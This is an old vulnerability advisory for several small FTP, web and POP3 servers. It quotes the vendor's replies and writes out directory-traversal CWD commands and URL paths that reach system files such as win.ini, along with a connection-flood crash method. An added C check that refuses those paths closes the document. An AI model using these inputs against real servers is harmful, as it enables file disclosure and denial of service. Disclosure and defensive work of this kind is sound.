In this advisory there are some vulnerabilities I found yesterday for BabyFtp server, Baby web server, Baby Pop3 server and Quick n' easy Ftp. I informed the company about these vulnerabilities and here are the e-mails they sent me:

-----------------------------------------------------------------
From pablovandermeer@kabelfoon.nl Wed May 28 21:42:08 2003
From: "Pablo"
To: xxxxxx xxxxxxx
Subject: Re: Multiple Vulnerabilities Found :)
Date: Wed, 28 May 2003 20:39:20 +0200

Hi,

Thank you very much for your report. First let me say that BabyFtp server, Baby web server, Baby Pop3 server are NOT real products but just (MFC) sample applications! They contain even more bugs than you can think of...

As for Quick 'n Easy FTP server: can you make more connections than configured in 'Max connections' settings? If so, how did you manage to do that?

Regards,
Pablo

Ok, thanks! It looks like this is related to the size of physical memory, when new sockets are created in virtual memory it will crash the application... :( I will take a look at it first thing tomorrow morning.

Regards and keep on hacking...
Pablo

------------------------------------------
Baby FTP 1.2 Multiple Vulnerabilities.
-------------------------------------------

Release Date: MAY 28, 2003

Systems Affected: Baby Ftp server Version 1.2

Description:
While I was testing Baby Ftp Server last night I found some vulnerabilities. Let's take a look at the following:

1) The FTP server is vulnerable to a directory traversal attack. A remote user can see the whole hard disk by supplying some strange CWD commands.
2) There is also a DoS attack. If you try to establish multiple connections from the same host to Baby Ftp server, it will crash.

Let's Dance (Exploit)
--------------------

(1) You need to supply these CWD commands for a successful attack:

CWD ...
CWD /...
CWD /......
CWD \...
CWD ...\
CWD .../

(2) Let's try to establish about 100 connections with the server from the same IP:

1 220 Welcome to Baby Ftp server
2 220 Welcome to Baby Ftp server
3 220 Welcome to Baby Ftp server
.
.
.
.
67 220 Welcome to Baby Ftp server

b00m..crash:>

The error message will be:
"Unhandled exception(MFC42.DLL):0xC00000005:Access Violation"

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Quick n' easy FTP server 1.7 DOS ATTACK
---------------------------------------

Systems Affected: Quick n' easy FTP server 1.7

Description:
------------
There is one D0s attack (yes again!) in Quick n' easy FTP server 1.7. By making a big number of connections you can crash the server:>

Exploit:
--------
The same as above...try to establish a big number of connections using the same IP and the server will crash.

BABY web server 1.5 Multiple bugs
---------------------------------------

Systems Affected: Baby Web server 1.5

Description:
------------
While I was checking Baby web server version 1.5 I found some stupid bugs. The first is a directory traversal bug and the second a DoS attack. Let's find out what is going on!
Exploit:
--------
(1) You can read whatever you want on the remote server by supplying some /.././ in your Web browser:

http://[server]/../../../../windows/win.ini
http://[server]\..\..\..\windows/win.ini
etc..etc..etc...

(2) Again, making a very big number of connections will crash the web server :)

It seems that all the products of www.pablovandermeer.nl have the same problem.

BABY Pop3 server Version 1.0 DOS attack
---------------------------------------

Systems Affected: BABY Pop3 server version 1.0

Description:
------------
There is the same DoS vulnerability here :P You can crash the server by making multiple connections from the same host.

-----------------------------------------------
vulnerabilities found and tested by dr_insane
-----------------------------------------------

Feedback
---------
Please send suggestions and comments to:
dr_insane@hack.gr
http://members.lycos.co.uk/r34ct/
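A server-side check that refuses the CWD arguments and URL paths listed in this advisory, as an added example that is not part of the original advisory or the vendor's code. The function name, the sample table, and the policy of refusing any dot-only segment of three or more dots and any path containing ':' are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* Added example: returns 1 if `path` stays at or below the served root,
 * 0 if it must be refused. '/' and '\\' both count as separators because
 * Windows accepts either one. */
int path_stays_in_root(const char *path)
{
    int depth = 0;                        /* directories below the root */
    const char *p = path;

    if (strchr(path, ':') != NULL)        /* assumed policy: no drive letters */
        return 0;

    while (*p != '\0') {
        size_t len = strcspn(p, "/\\");   /* length of the next segment */
        size_t dots = strspn(p, ".");     /* leading dots in that segment */

        if (len > 0 && dots == len) {     /* segment consists of dots only */
            if (len >= 3)
                return 0;                 /* "...", "......": refuse outright */
            if (len == 2 && --depth < 0)
                return 0;                 /* ".." would climb above the root */
            /* a single "." is the current directory: nothing to do */
        } else if (len > 0) {
            depth++;                      /* ordinary directory or file name */
        }
        p += len;
        if (*p != '\0')
            p++;                          /* step over one separator */
    }
    return 1;
}

int main(void)
{
    /* Constructed sample: request strings from the advisory plus two benign ones. */
    const char *samples[] = { "...", "/......", "...\\", ".../",
                              "/../../../../windows/win.ini",
                              "\\..\\..\\..\\windows/win.ini",
                              "/pub/files", "pub/../docs/a.txt" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-32s %s\n", samples[i],
               path_stays_in_root(samples[i]) ? "allow" : "refuse");
    return 0;
}
```

For the web server, run the check on the request path after percent-decoding, and still resolve the final path against the root directory before opening the file.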